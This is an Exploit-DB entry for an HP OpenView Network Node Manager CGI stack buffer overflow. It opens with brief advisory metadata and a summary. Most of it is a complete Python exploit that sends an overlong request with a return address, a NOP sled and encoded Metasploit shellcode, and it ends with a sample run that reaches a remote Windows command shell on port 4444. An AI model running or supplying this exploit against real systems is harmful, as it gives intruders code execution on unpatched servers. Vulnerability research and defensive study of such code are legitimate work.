HP OpenView Network Node Manager CGI Buffer Overflow

vendor:

OpenView Network Node Manager

by:

Mati Aharoni

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: OpenView Network Node Manager

Affected Version From: NNM Release B.07.50

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:hp:openview_network_node_manager:7.50

Metasploit:

Other Scripts:

Platforms Tested: Windows 2000 server SP4

HP OpenView Network Node Manager CGI Buffer Overflow

This exploit is a stack-based overflow in HP OpenView Network Node Manager. It has been tested on NNM Release B.07.50 on Windows 2000 server SP4. The exploit code sends an evil buffer to the NNM CGI and hijacks the entry point to inject sleep before execution, allowing for debugging. The payload is sent to the target, resulting in a shell being opened on port 4444.

Mitigation:

Apply the appropriate patch or upgrade to a non-vulnerable version of HP OpenView Network Node Manager.

Source

Exploit-DB raw data:

#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow 
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking 
# the entry point and injecting Sleep just before exe execution. This gave me enough 
# time to attach a debugger before program termination. If anyone knows how to properly 
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>

import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"

expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."

# milw0rm.com [2007-12-12]